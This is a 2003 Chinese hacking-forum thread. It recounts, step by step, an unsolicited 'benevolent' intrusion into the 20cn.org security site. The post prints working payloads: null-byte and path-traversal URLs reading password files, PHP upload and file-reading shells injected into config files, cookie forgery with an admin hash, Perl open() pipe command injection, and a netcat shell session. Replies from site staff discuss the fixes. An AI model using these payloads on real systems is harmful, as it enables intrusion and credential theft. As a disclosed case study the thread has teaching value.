论坛: 黑客进阶 标题: 剑走偏锋--灵巧的脚本攻击(转) 复制本贴地址    
作者: chair [chair]    论坛用户   登录
剑走偏锋--灵巧的脚本攻击
创建时间:2003-06-01
文章属性:原创
文章提交:PsKey (PsKey_at_hotmail.com)

|=-------再现善意侵入20CN.ORG全过程-------=|
|=---------=[ PsKey & EnvyMask ]=---------=|
|=----------------------------------------=|

作者:Envymask <130@21cn.com>
站点:http://envymask.3322.org
幻影旅团:http://www.ph4nt0m.net/bbs/

作者:[C4ST] PsKey <PsKey@hotmail.com>
站点:http://www.isgrey.com
小组主页:http://c4st.51.net
小组论坛:http://analysist.tocare.net

>>>Dedicated This Scrap To CaoJing & TaoZi<<<

武学之中, 出其不意、剑走偏锋才能发挥灵巧之长。在防火墙广泛地应用于网络之间执行访问控制策略的今天,以往被漠视的CGI安全悄然兴起,形形色色的脚本攻击在防火墙的“认同”下大行其道,看似简单的脚本实质上处处暗藏玄机。本文真实再现利用脚本缺陷善意侵入20CN的全过程,试图让您得到一点乐趣和启示。

20CN.ORG(20CN网络安全小组)是国内较为知名的黑客/安全站点,偶然间,我们开始了对她的安全测试。

没有任何迟疑,我们直接从WEB下手。据了解:20CN整站程序由站主NetDemon编写。基于代码规模和复杂度方面的考虑,我们把目光集中到了网站论坛。我们习惯首先查看用户信息,因为用户名和用户密码总是紧贴着保存在一起,在这里我们更容易接近我们渴求的信息。提交如下URL查看NetDemon用户信息:
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=netdemon
正常返回用户信息
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=./netdemon
出错提示:论坛系统出现问题!
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=netdemon%00
返回用户信息的“发贴数量”出现了一个莫名其妙的字符串,其他的一部分信息也全乱了

看来这里有点问题,这个字符串到底是怎么回事?我们用以前申请的ID登陆上去后,看到每个URL的QUERY_STRING后面都有一个名为key的变量,而且其值和上述的字符串有些相似。难道这个是密码?我们接连登陆几次后,观察到这个key值每次都不一样,看来这个key是用来识别我们在论坛的身份,应该与用户密码没有直接关系...还是先不管这个key值了,继续用我们的ID做实验,提交了这个URL
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=envymask%00

出来的还是跟先前类似的字符串,这个时候我们大胆猜测这个字符串是我们的密码,通过验证,我们发现这的确是把我们密码经过标准DES加密后得到的字符串。这证明了我们的猜测是正确的,这个字符串中就是加密过后的用户密码。但为什么密码会溜出来?于是我们接着推测:在用户数据目录里面肯定有两个保存每个用户信息的文件,一个里面保存有密码,而另一个没有,只有一些一般的信息,如邮箱,生日之类的。这两个文件应该一个是username,另一个是username.xxx(加了一个后缀)。userinfo.pl这个程序使用open函数打开文件的时候没有对user这个变量过滤完全,至少没有过滤掉 \0,这使得试图打开username.xxx文件的时候实质上打开的并不是username.xxx而是username。打开文件的代码可能是这样写的open(F,"$path/$username.xxx");所以当user=abcdef%00的时候相当于open(F,"$path/abcdef");而这个文件里正是保存用户密码的那个文件,所以部分用户信息变量直接到该文件中错误地取值,之后再反馈输出给用户,这样密码就出来了。惬意...我们随即找出了站长netdemon的密码,暴力破解的念头一闪而过后,我们看还能不能进一步突破这个目录,于是提交
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../../../../etc/passwd%00

密码档文件出来了,看来这里有搞头,继续
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../../../../etc/%00

受页面输出格式限制,我们只能查看到/etc目录中一部分文件和目录;于是试着打开一些文件,但也只能查看到文件的一些很小的片段,几乎没什么用,连续查看了很多文件过后,都没有新的突破,我们有点失望了。于是我们暂时把这个BUG放在一边,看看还有没有其他文件存在缺陷,继续找一些CGI程序如display.pl,show.pl等,都没有发现可以突破的地方,因为这些文件都做了一些过滤,看来这条路走不通了。

既然CGI方面不能突破,那就只有另想路子了。我们拿着那个userinfo.pl到处查看一些片段文件和目录,首先搜寻apache的配置文件,最后在/usr/local/etc/apache目录下找到了httpd.conf ,但还是只能查看文件头几行,这些根本没什么用。又跑到/home目录下看了看,嗯,有好多用户,比先前查看/etc/passwd里面的用户多多了,因为查看/etc/passwd的时候只能看到头几行,随便进了一个用户tomy的目录,咦,见到了目录/public_html,看来系统有可能给每个用户分配了发布个人主页的空间,有意思, 看在浏览器里面能不能访问到
http://www.20cn.org/~tomy

呵,看到这家伙的个人主页了,再看看里面的东西,这时我们意外地看到了一个/phpmyadmin目录,立刻访问,发现竟然没有密码验证。现在的我们相当于得到了一个Mysql的用户,我们试图通过phpmyadmin往数据库里写东西,内容是一个小的phpshell,然后导出到主页目录里,忙活了半天,终于全写进去了,但往硬盘上写的时候却发现没有权限写,一阵郁闷袭来...

继续查看了几个用户的目录,大部分都没有发布更多的东西,只有些静态的页面。经过一番努力后,我们终于找到了冤大头--shuaishuai(帅帅)这个用户,转到他发布的主页上看看,哈,发现了这个
http://www.20cn.org/~shuaishuai/show.php?filename=20030329185337.txt

好家伙,看看能不能跳转目录
http://www.20cn.org/~shuaishuai/show.php?filename=../../../../../../../etc/passwd

返回了下面这些东西给我们
Warning: is_file() [function.is-file]: SAFE MODE Restriction in effect. The script whose uid is 1007 is not allowed to access ./data//../../../../../../etc/passwd owned by uid 0 in /usr/home/shuaishuai/public_html/show.php on line 77

失败,但并不是不能跳转,只是没有权限而已。那好,我们再试着看看能不能查看有权限的文件
http://www.20cn.org/~shuaishuai/show.php?filename=../../../../../../../home/shuaishuai/public_html/post.php

呵呵,成功了,看到了post.php这个文件的源代码,太棒了,我们就把这个做为突破口。但这个只能查看shuaishuai这个用户的文件,不能查看到其他文件,而且只是能查看文件似乎还不够,我们希望得到一个shell,这看起来似乎比较困难。还是另看看其他,其实shuaishuai的主页上东西蛮多的,还有一个留言板,是X-pad.这个留言板可以让用户注册后留言,每个注册用户在/User目录下面都有一个配置文件,保留了用户的一些信息,在查看注册文件源代码后我们发现它并没有过滤完全,至少有一个变量可以使我们可以插入我们的代码。于是我们申请了一个用户在HOMEPAGE这个字段插入了我们的代码,使我们的用户配置文件看起来像这样:

<?
$User_Psw        = "1234";
$User_QQ        = "";
$User_EMail        = "";
$User_Homepage    = "http://\";copy($a,$b);unlink($a);#";
$User_Avatar    = "Styles/Avatars/blank.gif";
$User_BBSMode    = "0";
?>

上面这个php文件使我们可以上传文件到指定目录和删除有权限删除的文件.但在执行过程中却发现不行,为什么?原来没有看清楚

$User_Homepage    = "http://\";copy($a,$b);unlink($a);#";

这一行中我们提交的"(引号)前面被自动插入了\,使得它不是php语句中的双引号("),而是变量中的(") 。即$User_Homepage变量值为 “http://\";copy($a,$b);unlink($a);#” 整个字符串,并没有起到预期的作用。看来 magic_quotes_gpc = on,再告失败。

没有气馁,我们继续耐心地查找其他可以利用的东西,马上我们又发现了http://www.20cn.org/~shuaishuai/down_sys/ 这么个下载系统.经过查看目录和查看下载系统的源文件(因为我们有权限查看这个目录里的文件),在down_sys/data/user/目录下面发现了管理员的用户文件,里面包含了密码,但令人头痛的是管理员密码是经过md5加密的。此时我们没有轻易放弃这个经加密的密码,我们即刻查看管理员验证的代码,在/down_sys/admin/global.php这个文件中发现了其验证方式包含cookie验证,相关代码如下:
......
if (isset($password)) $password=md5($password);
if (empty($username)) $username=$HTTP_COOKIE_VARS['bymid'];
if (empty($password)) $password=$HTTP_COOKIE_VARS['bympwd'];

if(!checkpass($username,$password)) {
admintitle();
adminlogin();
    exit;
}
......

完全可以进行一次cookie欺骗。我们这里使用的是一种比较烦琐的方法:
先断开网络,将我们的IP改为20cn.org的IP,然后在%systemroot%\system32\drivers\etc\hosts文件里把www.20cn.org这个域名指向20cn.org的IP,做这一步是为了我们在断开网络的时候能够成功的将www.20cn.org解析成它的IP.最后在我们的IIS里面自已建一个虚拟目录/~shuaishuai/down_sys/admin/写一个asp文件,把cookie设置为管理员的用户名和加过密的密码,asp文件内容如下:

<%
response.cookies("bymid")="adminuser"
response.cookies("bympwd")="596a96cc7bf91abcd896f33c44aedc8a"
%>

然后访问这个asp文件
http://www.20cn.org/~shuaishuai/down_sys/admin/cookie.asp

留着这个窗口,把IP改回为原来的192.168.0.1,接着用这个窗口请求
http://www.20cn.org/~shuaishuai/down_sys/admin/admin.php

管理界面出来了,通过了验证。接着我们来上传文件...可下面的事让我们气恼了好久,竟然没有上传文件的功能,Fiant,是一个没开发完全的半成品,彻底失望了吗?不,我们依然有信心,接着查看一下其他的文件,看看能不能对配置文件动点手脚,我们找到了一个class.php,里面保存的是下载系统的一些软件分类信息,内容看起来像这样:

5|安全工具|1028372222
8|红客工具|1034038173
7|其它软件|1034202097
....
我们试着往里面写东西,于是在管理页面新添加一个主分类,分类的名称为"<?copy ($a,$b);unlink($a);?>",提交过后class.php变成了这样

5|安全工具|1028372222
8|红客工具|1034038173
7|其它软件|1034202097
9|<?copy($a,$b);unlink($a);?>|1054035604

这个php文件可以让我们上传文件到有权限目录和删除有权限删除的文件。于是我们在本地写了一个表单,上传一个phpshell上去,然后访问
http://www.20cn.org/~shuaishuai/down_sys/data/sh.php

GOOD,返回了phpshell的界面...一阵高兴过后,我们才发现这个phpshell什么命令都不能执行,原来网站PHP打开了safe_mode功能,限制我们执行命令。但我们已经有了很大的突破了,可以向服务器上传文件了。接下来我们利用PHP丰富的内置函数写了很多小脚本上传测试,很不幸,系统利用 disable_functions 禁止了大部分的文件系统函数、目录函数...好在并没有赶尽杀绝,最后我们写了下面一个php程序来查看一些有权限查看的目录和文件:

<?
$c = $HTTP_GET_VARS["c"];
$f = $HTTP_GET_VARS["f"];
if($c=="file") {
$file=readfile($f);
echo $file;
}
if($c=="dir") {
$h=opendir($f);
while($file=readdir($h)) {
echo "$file\n";
}
}
if($c=="del") {
unlink($f);
}
?>

在做了很多尝试过后,我们发现在PHP上不能获得新的突破,好在我们可以利用上面那个php程序来查看www.20cn.org/cgi-bin/club/scripts/ 目录中程序脚本的完整的代码,于是我们决定改向回到起点、查看CGI文件,由于没有权限向可执行CGI程序的目录里写文件, 新写一个CGI程序来执行命令是不现实的,所以决定利用现有的.pl程序来插入命令,目标自然是放在perl的open函数上,于是我们开始查找哪些程序用了open函数,但找了好多.pl文件,都没有发现,但却看到有好多readfile()函数,记得perl里面是没有这个函数的,但这里却用了很多readfile(),为什么呢?这肯定是他们自已定义的一个函数,我们看到每一个.pl文件前几行都有一个use Club;原来这里有个模块,于是查看Club.pm,很快便发现了open函数.

sub readkey {
my($file)=@_;
  unless(open(FH,"$file")) {
    errmsg("对不起!你超时了,请<a href=\"$login_page\" target=\"_parent\">重新登陆</a>");
    exit;
  }
   unless(flock(FH,LOCK_SH)) {
    errmsg("Can't Lock File: $file");
  }
my $data = <FH>;
close(FH);
return $data;
}

这就是那个自定义的readfile函数,证实了我们的猜想,而且也找到了一个符合要求的open函数,接着搜寻哪个文件调用了这个函数,很快我们在change_pw.pl这个程序里找到了这个函数调用,这个程序用来修改用户的密码,不幸的是代码在判断用户旧密码是否正确前就调用了 readkey() 函数:

my $key_info=readkey("$key_dir/$key");

于是提交
http://www.20cn.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../../../../../../bin/ls%20>bbb%20|

再查看一下
http://www.20cn.org/cgi-bin/club/scripts/bbb

Yeah!成功执行了...出现了我们期望的结果,这真是太妙了,可以利用这个来执行命令,就相当于得到了一个shell。但这样办事毕竟不方便,不能及时地查看我们的运行结果。因此我们又上传了一个文件、编译、执行,然后

D:\temp>nc -vv www.20cn.org 12345 www.20cn.org [211.161.57.29] 12345 (?) open
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD ns8.20cn.com 4.8-RELEASE FreeBSD 4.8-RELEASE #1: Wed Apr  2 07:01:40 CST 2003     root@ns8.20cn.com:/usr/obj/usr/src/sys/20CN  i386

哦,是FreeBSD 4.8-RELEASE,版本很高,提升权限比较困难,我们找了好久都没有找到有效的local exploit,提升权限失败,只好作罢。

到这里,我们的hacking基本上结束了。虽然没拿到root,但至少拿到了网站WEB权限,对于我们CGI安全爱好者来说,应该算是完成了本职工作吧-)。之后我们迅速与站主联系,提醒他网站存在安全隐患,但站主并没有向我们询问细节,他自己通过分析日志修复了漏洞。 

地主 发表时间: 06/01 20:26

回复: 马大哈 [bedlamite]   版主   登录
做为猪头,该把一切可能都考虑进去,该狠心的时候一定不能手软!

建议取消所有分配给个人的空间CGI,PHP支持。

B1层 发表时间: 06/01 23:37

回复: TomyChen [quest]   版主   登录
其实最大的原因,在于分配的个人空间。而我们常常搞一些小程序的时候根本就没考虑到关系整个服务器的安全性的问题:(最该打的是我,居然先是用了我的PHPMYADMIN,虽然能做的事很少,但是……多多少少给了一点信息了吧,应该好好检讨。各位要打就打轻点,我PP刚刚被老大扁过:D。

不过也应该向PsKey表示感谢,也对他这种做法表示欣赏!而我们是不是也该想点什么?

B2层 发表时间: 06/01 23:52

回复: TomyChen [quest]   版主   登录
呵,一般我都没有用密码验证的习惯,我一般都是用字符界面操作MYSQL的。而老大没给我TELNET的权限,又把MYSQL设成了,LCOALHOST访问的,我把PHPMYADMIN上传了又没加这个。唉~~~惭愧啊~~~~

B3层 发表时间: 06/02 00:01

回复: NetDemon [netdemon]   ADMIN   登录
php方面的基本是辅助性的,尽管导致原码泄漏,但最终还是open()函数祸害的,我原来都是sysopen(),那么就不会有管道和从定向的问题。但后来在测试转换为fastcgi的时候,因为有一些问题就用open()了,结果要改的地方太多,没时间,fastcgi没转成,恢复的时候阴差阳错还是用了open(),一些不常用的程序也没有重新检查过,这陷阱都摆在那里快一年了,真是滑稽得很啊~~
这次真是谢谢他们了

B4层 发表时间: 06/02 03:20

回复: magic [buaaytt]   论坛用户   登录
这样的攻击才是智慧的结晶啊
汗……

B5层 发表时间: 06/02 09:21

回复: ma2751_cn [ma2751_cn]      登录
    沉思过后,回想一个复杂的论坛谁能保证没有漏洞呢?那只需要去发掘,然而那需要多少知识!多少经验!!尽管网站的程序‘安全’了,但配置的一些错误也会导致严重的漏洞,相反毅然,这是意想不到的。
    如果时间能够倒流,我愿意也很想看看那到底是怎么样的漏洞,体验一下攻击的过程。
    在这黑客技术泛滥的年代,还有谁会像NetDemon,PsKey,Envymask一样专门的搞技术呢?有点技术的人早就开个人网站,招收VIP会员教学徒赚钱去了。
    原为资源共享而开发的网络,在不久的将来会是怎么样呢~~~

B6层 发表时间: 06/02 09:57

回复: 夕阳 [cimsxiyang]   版主   登录
好帖子,建议精华区

B7层 发表时间: 06/02 16:31

回复: zsw_99 [zsw_99]   论坛用户   登录
我先声明我不是hacker(水平差得太远)也不是real programmer!
我觉得现在是“黑客”泛滥的年代,我们缺乏的是一种奋斗和创新的
精神!windows是美国的,unix是也是美国人ken thompson写的
连c语言也是美国人dennis ritchie发明的!嗨!难道我们中国就
不如美国人吗?绝对不是!!那又为什么呢?我想主要是没有一个
人站出来!!还有就是追求中的迷茫!现在我们不能再做作以待毙了!
我们应该扎扎实实的作一些有用的工作!黑客并是一味的入侵和破坏
而是挑战技术!挑战自我!现在就有个难题等着我们解决--开发我们自己
的系统和语言!能做到吗?只有我们团结起来不懈的努力才能做到!
就从现在开始吧!最后要讲的是chair的精神是值得我学习的!

B8层 发表时间: 06/02 22:08

回复: TomyChen [quest]   版主   登录
楼上的,我从头到尾就不知道你在说什么哪

B9层 发表时间: 06/03 08:29

回复: 路小佳 [jacker]   论坛用户   登录
除了对PSKEY精湛的程序钻研程度及熟练的基本功佩服外,同时也表现了NETDEMON的检测水平之高(虽然只是简单的一些语句描述,但其中包含了站长的技术水平的不一般)

能过这次的检测文章,让我明白了自身的不足,使我有了前进的动力!

B10层 发表时间: 06/03 08:57

回复: zsw_99 [zsw_99]   论坛用户   登录
 TomyChen我是服了你啦!我已经说得很清楚了啊!
就是讲应该形成我们自己的hacker文化啊!
美国早期不是有mit,sall,cmu,at&t等团体组织吗 !
20cn网络小组应该组织一些programmer一起来开发我们自己的
操作系统啊!不要以为很难啊!linux不是芬兰helsinki university
的一个学生叫linus torvalds写的吗!为什么我们中国人就不能呢?
只要有人做啊!我的意思很清楚了吧!应该集中力量搞的我们需要的
实际的东西啊!我们现在最需要的就是自己的人的系统!老是用别人
太不爽了! 


[此贴被 zsw_99(zsw_99) 在 06月03日11时01分 编辑过]


[此贴被 zsw_99(zsw_99) 在 06月03日11时49分 编辑过]

B11层 发表时间: 06/03 11:43

回复: 路小佳 [jacker]   论坛用户   登录
TO:  zsw_99

如果你有兴趣,我介绍一位朋友让你认识…!
他现在在开发SNIFFER(NT/UNIX系统)
另,他的目标是开发一操作系统。

B12层 发表时间: 06/03 11:53

回复: magic [buaaytt]   论坛用户   登录
又一个愤青
我想你不用拿些外国佬的名字出来唬人吧
你说的那些所谓的历史啊,文化啊我想每个喜欢Unix的人都知道
还是踏实点做事情吧,要学的还很多
到了大家都真正学有所成的时候,那你所谓的文化也就自然形成了
就像你把Unix的内核搞清楚了,想不成为黑客都难啊

B13层 发表时间: 06/03 12:27

回复: NetDemon [netdemon]   ADMIN   登录
你竟然把AT&T MIT这些叫做黑客组织你也真是够幽默的了
AT&T是美国电话电报公司,在美国的地位相当于中国的中国电信。MIT是麻省理工大学,都是牛得不能再牛的东东。

写操作系统么,真的是不难,如果要写一个能启动,在特定硬件平台上运行,支持几个基本功能的操作系统我一个人什么都不干花几个月时间也勉强可以写出来,但是有用么?没有啊,你怎么去和现有的东西比呢?这个叫做属于自己的操作系统一点价值没有。一个可以实际使用的操作系统,决不是几个人可以完成的,最起码,硬件的支持就是一个巨大的难体,一个系统的成功,技术的因素当然是主要的,但是适当的机遇也是具有很大的决定性的。

linux是芬兰人开头写的这没错,但却是全世界的程序员共同完成出来的,他也不是属于芬兰的,他是属于全人类的。象*BSD这样的东西,他也不是属于美国的,他是全人类都可以用的,可以研究并发挥,可以为他写代码的。如果你在44BSD的基础上完成的话,这也可以算是一个自己的操作系统了。
没错美国的计算机技术比我们好很多,但这个涉及到整个国家的产业结构的问题,和经济、政治条件了。不能一味的追求一些与现实差距较远的东西。

B14层 发表时间: 06/03 12:46

回复: zsw_99 [zsw_99]   论坛用户   登录
 NetDemon我没说at&t和mit是黑客组织啊!我只是说他们是个团体组织啊!你是理解错误吧!还有magic我没有拿些外国佬的名字来吓人啊!
我也不想成为黑客啊!我的意思不是讲在研究中学习成长吗!你不去
搞你怎么知道呢?你不去实践你怎么能比别人更了解呢?还有 NetDemon
你有没有想过你写个系统让全世界的programmer去修改呢?这些不是
正是需要有人去做吗?路小佳谢谢你啦!呵呵!文化正是在研究和讨论
中形成的啊!我很高兴有这么大侠来和我讨论啊!我是受益非浅啊!

  谢谢!

B15层 发表时间: 06/03 13:07

回复: NetDemon [netdemon]   ADMIN   登录
嗯~~这个说是团体组织也是不对的阿,但这个无伤大雅,不用追究
我可能年纪比较大了,所以不做一些和现实差距比较大的梦,脚踏实地做些比较有意义的研究比做梦有意思
这个话题和帖子本身没有联系,希望大家不要继续讨论下去,起码这是对楼主不尊重的表现,谢谢

B16层 发表时间: 06/03 14:08

回复: laievf [laievf]   论坛用户   登录
论坛在用户名提交时没有把用户名和密码加密,这样轻而易举就嗅探到了明文密码,特别是像我这样用代理上网的,很不安全,可不可以修改一下

B17层 发表时间: 06/14 11:59

回复: 相见不如怀念 [admin_20cn]   论坛用户   登录
哎~~~这个,我怎么说呢?
不说了吧

B18层 发表时间: 06/14 12:54

回复: xiean [xiean]   论坛用户   登录
引用:

论坛在用户名提交时没有把用户名和密码加密,这样轻而易举就嗅探到了明文密码,特别是像我这样用代理上网的,很不安全,可不可以修改一下 



...............没见过哪个站的提交部分是加了密再发给主机的,先不谈 java 本地加密显得苍白无力,就算加过密,那么加密的算法必然会在你本地,那么又谈什么加密而言,一个有心人,真要这样做的话,你是否在本地加密发送还是明文发送则都一样,而 SSL 则是因此而发展起来的,所以这不是代码的问题。。。你可以。。。让老大全放在 ssl 上面,嘿


[此贴被 邪·安(xiean) 在 06月16日00时51分 编辑过]

B19层 发表时间: 06/16 00:33

回复: 晓澜 [group]   论坛用户   登录
在你本机监听,一点办法都没有,SSL解决的就是网络安全的问题,本地的输入谁管得着啊~

B20层 发表时间: 06/16 15:06

回复: sunshine [bysx]   论坛用户   登录
其实早期的at&t下有个贝尔实验室,它可说是一个传统上的黑客组织.

B21层 发表时间: 06/16 22:16

回复: root_bug [root_bug]   论坛用户   登录
....马赛克处理
警告1次!!!

[此贴被 TomyChen(quest) 在 07月11日08时16分 编辑过]

B22层 发表时间: 06/24 23:08

回复: 超音猪 [fox2000253]   论坛用户   登录
很早以前就看过这篇文章了,入侵苦吗?  看看文章里面失败一词出现的次数,入侵需要耐心吗?>

看看他们总共做了多少次尝试,我们看文章的时候也许感到相当的容易,作者把这次艰苦的经历轻

描淡写的描述了出来,在此我不得不由衷的叹服作者的黑客精神~~ 

B23层 发表时间: 05-09-09 23:50

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号